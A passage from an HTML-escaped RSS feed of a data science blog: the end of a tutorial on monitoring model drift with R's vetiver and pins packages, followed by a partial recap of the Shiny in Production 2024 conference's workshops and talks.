&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; date_var &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; period &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; truth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; life_expectancy,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; estimate &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .pred
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;metrics
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 9 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; .index .n .metric .estimator .estimate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;date&amp;gt; &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 2000-01-01 46 rmse standard 4.06 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 2000-01-01 46 rsq standard 0.836&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3 2000-01-01 46 mae standard 3.05 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 4 2001-01-01 44 rmse standard 4.61 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 5 2001-01-01 44 rsq standard 0.844&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 6 2001-01-01 44 mae standard 3.43 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 7 2002-01-01 36 rmse standard 4.14 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 8 2002-01-01 36 rsq standard 0.853&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 9 2002-01-01 36 mae standard 3.04&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first line of code here sends new data (in this case the unseen test
data) to our model and generates a &lt;code&gt;.pred&lt;/code&gt; column containing the model
predictions. This output is then piped to
&lt;code&gt;vetiver::vetiver_compute_metrics()&lt;/code&gt; which includes the following
arguments:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;date_var&lt;/code&gt;: the name of the date column to use for monitoring the
model performance over time.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;period&lt;/code&gt;: the period (&lt;code&gt;&amp;quot;hour&amp;quot;&lt;/code&gt;, &lt;code&gt;&amp;quot;day&amp;quot;&lt;/code&gt;, &lt;code&gt;&amp;quot;week&amp;quot;&lt;/code&gt;, etc) over which the
scoring metrics should be computed. We are restricted by our data to
using &lt;code&gt;&amp;quot;year&amp;quot;&lt;/code&gt;; for more granular data it may be more sensible to
monitor the model over shorter timescales.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;truth&lt;/code&gt;: the actual values of the target variable (in our example this
is the &lt;code&gt;life_expectancy&lt;/code&gt; column of the test data).&lt;/li&gt;
&lt;li&gt;&lt;code&gt;estimate&lt;/code&gt;: the predictions of the target variable to compare the
actual values against (in our example this is the &lt;code&gt;.pred&lt;/code&gt; column
computed in the previous step).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We will come back to these metrics later in this post, so for now let’s
store them along with our model using {pins}:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pin_write&lt;/span&gt;(model_board, metrics, &lt;span style="color:#a5d6ff"&gt;&amp;#34;k-nn&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will skip over the details of deploying our model since this is
already covered in &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/" rel="external"&gt;Part
2&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="monitoring-our-model"&gt;Monitoring our model&lt;/h2&gt;
&lt;p&gt;Over time we may notice our model start to &lt;em&gt;drift&lt;/em&gt;, where its
predictions gradually diverge from the truth as the data evolves. There
are two common causes of this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Data drift&lt;/strong&gt;: the statistical distribution of an input variable
changes.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Concept drift&lt;/strong&gt;: the relationship between the target and an input
variable changes.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Taking the example of life expectancy data:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A country’s expenditure is expected to vary over time due to changes
in government policy and unexpected events like pandemics and economic
crashes. This is &lt;em&gt;data drift&lt;/em&gt;.&lt;/li&gt;
&lt;li&gt;Advances in medicine may mean that life expectancy can improve even if
BMI remains unchanged. This is &lt;em&gt;concept drift&lt;/em&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Going back to our model which was trained using data from 2000 to 2002,
let’s now check how it would perform on “future” data up to 2010:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Generate &amp;#34;new&amp;#34; data from 2003 to 2010&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;new_life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(year &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;2002-01-01&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;2010-01-01&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Score the model performance on the new data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;new_metrics &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;augment&lt;/span&gt;(v_model, new_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; new_life_expectancy) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_compute_metrics&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; date_var &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; period &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; truth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; life_expectancy,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; estimate &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .pred
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;new_metrics
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 24 × 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; .index .n .metric .estimator .estimate&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;date&amp;gt; &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 2003-01-01 141 rmse standard 5.21 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 2003-01-01 141 rsq standard 0.760&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3 2003-01-01 141 mae standard 3.64 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 4 2004-01-01 141 rmse standard 5.14 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 5 2004-01-01 141 rsq standard 0.761&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 6 2004-01-01 141 mae standard 3.60 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 7 2005-01-01 141 rmse standard 5.83 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 8 2005-01-01 141 rsq standard 0.684&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 9 2005-01-01 141 mae standard 4.19 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 10 2006-01-01 141 rmse standard 6.23 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # ℹ 14 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s now store the new metrics in the model {pins} board (along with
the original metrics):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_pin_metrics&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; model_board,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; new_metrics,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;k-nn&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can now load both the original and new metrics then visualise these
with &lt;code&gt;vetiver::vetiver_plot_metrics()&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load the metrics&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;monitoring_metrics &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pin_read&lt;/span&gt;(model_board, &lt;span style="color:#a5d6ff"&gt;&amp;#34;k-nn&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Plot the metrics&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;vetiver_plot_metrics&lt;/span&gt;(monitoring_metrics) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_size&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of\nobservations&amp;#34;&lt;/span&gt;, range &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/./metrics-1.svg" alt="A line plot showing the evolution of the maximum absolute error, root-mean-squared error and R-squared metric of the trained life expectancy model over time between the years 2000 and 2010. Both error measurements increase over time, while the R-squared metric decreases." width="666.666666666667" style="display: block; margin: auto;" /&gt;
&lt;p&gt;The size of the data points represents the number of observations used
to compute the metrics at each period. Up to 2002 we are using the
unseen test data to score our model; after this we are using the full
available data set.&lt;/p&gt;
&lt;p&gt;We observe an increasing model error over time, suggesting that the
deployed model should only be trained using the latest data. For this
particular data set it would be sensible to retrain and redeploy the
model annually.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;In this blog we have introduced the idea of monitoring models in
production using the Vetiver framework. Using the life expectancy data
from the World Health Organisation as an example, we have outlined how
to track key model metrics over time and identify model drift.&lt;/p&gt;
&lt;p&gt;As you start to retire your old models and replace these with new models
trained on the latest data, make sure to keep ALL of your models (old
and new) versioned and stored. That way you can retrieve any historical
model and establish why it gave a particular prediction on a particular
date.&lt;/p&gt;
&lt;p&gt;The {vetiver} framework also includes an R Markdown template for
creating a model monitoring dashboard. For more on this, check out the
&lt;a href="https://vetiver.posit.co/get-started/monitor.html" rel="external"&gt;{vetiver}
documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The next post in our Vetiver series will provide an outline of the
Python framework. Stay tuned for that sometime in the new year!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Highlights from Shiny in Production (2024)</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2024/</link><pubDate>Thu, 17 Oct 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2024/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2024/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2024/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
[id="speaker-images"] {
display: flex;
padding-top: 2em;
column-gap: 0.25em;
row-gap: 1em;
justify-content: center;
flex-wrap: wrap;
}
[id="speaker-images"] picture {
display: contents;
}
[id="speaker-images"] img {
flex: 1 0 200px;
min-width: 200px;
max-width: 350px;
}
&lt;/style&gt;
&lt;p&gt;Hot on the heels of Shiny in Production 2022 &amp;amp; 2023, we were excited to dive back into all things Shiny for a third consecutive year. In this post we recap the highlights from the two days of talks and workshops.&lt;/p&gt;
&lt;h2 id="workshops"&gt;Workshops&lt;/h2&gt;
&lt;p&gt;As with previous iterations of the conference, we began on Day 1 with an afternoon of insightful workshops:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Level up your plots: Tips, tricks and resources for crafting compelling visualisations with R and ggplot2:&lt;/strong&gt; Following her stand-out talk at Shiny in Production 2023, we were delighted to welcome back Cara Thompson for both a talk AND a workshop this year! Cara&amp;rsquo;s hands-on workshop offered attendees a chance to craft appealing and informative visualisations of their data without compromising on accessibility.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Building Responsive Shiny Applications:&lt;/strong&gt; Our very own Shiny expert, Pedro Silva, shared some responsive design principles and best practices for Shiny developers to build fluid web pages that run on various screen sizes from desktops to mobile devices.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Asynchronous Shiny:&lt;/strong&gt; Our data scientist and trainer, Russ Hyde, introduced the idea of asynchronous programming, providing attendees with the basics to solve between-session and within-session blocking in a Shiny app.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Building Apps for Humans:&lt;/strong&gt; Osheen MacOscar (another JR data scientist!) explored the basics of human-computer interaction and outlined how layout, colour, size and motion in a Shiny interface can be used to enhance the user experience.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Noticing a trend here? At Jumping Rivers we offer training and upskilling in all things Shiny! If you&amp;rsquo;re keen to learn more about Shiny (or data science more generally) check out our full list of available training courses &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-shiny-in-production-highlights"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;figure id="speaker-images"&gt;
&lt;picture&gt;
&lt;source srcset="main-talks.webp 1x, main-talks@2x.webp 2x" type="image/webp"&gt;
&lt;img src="main-talks.jpg" alt="Photo of all main speakers"/&gt;
&lt;/picture&gt;
&lt;picture&gt;
&lt;source srcset="lightning-talks.webp 1x, lightning-talks@2x.webp 2x" type="image/webp"&gt;
&lt;img src="lightning-talks.jpg" alt="Photo of all lightning-talk speakers"/&gt;
&lt;/picture&gt;
&lt;/figure&gt;
&lt;h2 id="talks"&gt;Talks&lt;/h2&gt;
&lt;p&gt;On Day 2 we enjoyed talks from some fabulous speakers across a range of industries!&lt;/p&gt;
&lt;h3 id="keynote-cara-thompson-data-visualisation-consultant"&gt;Keynote: &lt;a href="https://www.cararthompson.com/" rel="external"&gt;Cara Thompson&lt;/a&gt; (Data visualisation consultant)&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Data-To-Wow: Leveraging Shiny as a no-code solution for high-end parameterised visualisations&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The vast majority of data visualisations start from the data, and while you may not know exactly how the final image will look at the start, you can tweak and refine your way to a result that looks good.
But Cara had a slightly different challenge: take an existing data visualisation the client has designed, and recreate it in {ggplot2} so the plots can be quickly generated from any future data.&lt;/p&gt;
&lt;p&gt;Cara guided us through how she tackled some of the challenges encountered along the way, such as creating your own {ggplot2} geom in order to draw straight lines between points when the plot uses polar coordinates.
There were also lessons in why we shouldn&amp;rsquo;t always rely on a single numerical summary like the mean in a plot, when the raw data has the potential to show us patterns we&amp;rsquo;d ordinarily lose.&lt;/p&gt;
&lt;p&gt;But in order to be useful for the client, all this hard-work needs to be easy-to-use.
And when the client has no prior experience with running R code or using an &lt;abbr title="Integrated development environment"&gt;IDE&lt;/abbr&gt; like RStudio, Shiny becomes a valuable tool for allowing anyone to run R code, without needing to know how to run the R code.
To make it as easy as possible to run the Shiny application, Cara provided her client with a desktop shortcut; click on it to automatically execute the Shiny application in a background R process, and displays the Shiny app in a web browser as normal.
The net result is the client can locally run the Shiny app on their computer, just like they would any other software application.&lt;/p&gt;
&lt;h3 id="pedro-silva-jumping-rivers"&gt;&lt;a href="https://pedrocsilva.com/" rel="external"&gt;Pedro Silva&lt;/a&gt; (Jumping Rivers)&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Convincing IT that R packages are safe&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;When IT departments are responsible for ensuring the security and integrity of the systems they manage, it&amp;rsquo;s understandable that IT managers will be reluctant to install software if they can avoid it.
Combine this with the nature of open-source software often being maintained by thousands of volunteers&amp;mdash;with some operating entirely under online pseudonyms&amp;mdash;and they can also start to view some software with great scepticism.
The issue becomes even more serious when you work in a heavily regulated industry&amp;mdash;such as banking, pharmaceuticals or critical national infrastructure&amp;mdash;where the systems could be scrutinised in an audit or the consequences of a compromised system can be severe.&lt;/p&gt;
&lt;p&gt;Pedro provided an insight into the need to validate R packages, and the solutions Jumping Rivers is currently working on with organisations in industry.
The aim is to provide information that summarises the risk of using any R package on &lt;abbr title="The Comprehensive R Archive Network"&gt;CRAN&lt;/abbr&gt; based on the quality of its development.
Users can specify additional and stricter test criteria for what should be checked and apply weighting of what testing criteria should have a greater influence on the final risk summary scores.&lt;/p&gt;
&lt;p&gt;With this information, organisations will be able to determine if the package they want to use is safe enough to use.
Where packages are identified to carry too much risk, they can invest time in fixing the issues in the weakest areas of the package, such as increasing test coverage on some of the package methods.&lt;/p&gt;
&lt;p&gt;Pedro rounded off the talk by demonstrating the use of Quarto to generate summary reports and a Shiny dashboard that allows users to explore breakdowns of validation scores from different packages.&lt;/p&gt;
&lt;h3 id="vikki-richardson-audit-scotland"&gt;&lt;a href="https://www.linkedin.com/in/vikkirichardsondata/" rel="external"&gt;Vikki Richardson&lt;/a&gt; (Audit Scotland)&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Faster than a Speeding Arrow - R Shiny Optimisation In Practice&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;When the size of your data is large enough to cause considerable loading times, it&amp;rsquo;s time to start optimising how your data is handled.
Vicky talked us through how her team went about cutting their application loading times.&lt;/p&gt;
&lt;p&gt;There are many strategies for trying to make a more performant application.
The most obvious is to throw more compute resources at the problem; have more instances of the application run so concurrent users each get a faster experience.
But it doesn&amp;rsquo;t necessarily solve the underlying issue, it inflates your compute costs, and as a solution, it lacks a certain elegance.&lt;/p&gt;
&lt;p&gt;Data caching from the {memoise} package can provide great speed-up, but with Arrow, there was more to be found.
With Vicky explaining how they were able to interface with Apache Arrow commands using {dplyr} syntax, and highlighting some of the drawbacks with this method such as when certain {dplyr} verbs aren&amp;rsquo;t supported by Apache Arrow, the end result was certainly impressive.
The combination of caching and use of Apache Arrow saw data processing times slashed from several minutes to under 2 seconds.&lt;/p&gt;
&lt;h3 id="gareth-burns-exploristics"&gt;&lt;a href="https://www.linkedin.com/in/drgarethburns/" rel="external"&gt;Gareth Burns&lt;/a&gt; (Exploristics)&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Shiny in Secondary Education: Supplementing traditional learning resources to allow students to explore statistical concepts&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Gareth describes this project as &amp;ldquo;a passion project that wouldn&amp;rsquo;t have been successful without Shiny&amp;rdquo;.
It all started with a call to action by Steve Mallett, that led to Gareth volunteering his time towards the development of a Shiny application that could be used for &lt;a href="https://psiweb.org/careers/outreach/schools-outreach" rel="external"&gt;science communication in secondary schools&lt;/a&gt;, that makes learning fun, engaging and interactive.&lt;/p&gt;
&lt;p&gt;The app addressed a number of issues with how the existing workshops were performed, such as removing the need for most physical materials to be sent to different locations.
There were valuable lessons along the way too, such as the importance of making your application robust to the mischievous minds of secondary-level students who will find creative ways to break your work, and ensuring your data visualisations will be understandable to your target audience.
And ideas for minimising potential human data-input errors by having the data captured within the application itself.&lt;/p&gt;
&lt;p&gt;The live demonstration of the Shiny application showcased some well-designed custom-made widgets and modules, crafted using self-made &lt;abbr title="Hyper-text markup language"&gt;HTML&lt;/abbr&gt;, &lt;abbr title="Cascading style sheets"&gt;CSS&lt;/abbr&gt; and JavaScript. And inspiration for making the application more engaging to young students was provided to gamify the activity. The slides can be found &lt;a href="https://rpubs.com/garethburns/ShinyinSecondaryEducation" rel="external"&gt;here&lt;/a&gt; and the (messy) code is on &lt;a href="https://github.com/GABurns/Presentations/tree/master/Shiny%20in%20Production" rel="external"&gt;Github.&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="tan-ho-zelus-analytics"&gt;&lt;a href="https://twitter.com/_TanHo" rel="external"&gt;Tan Ho&lt;/a&gt; (Zelus Analytics)&lt;/h3&gt;
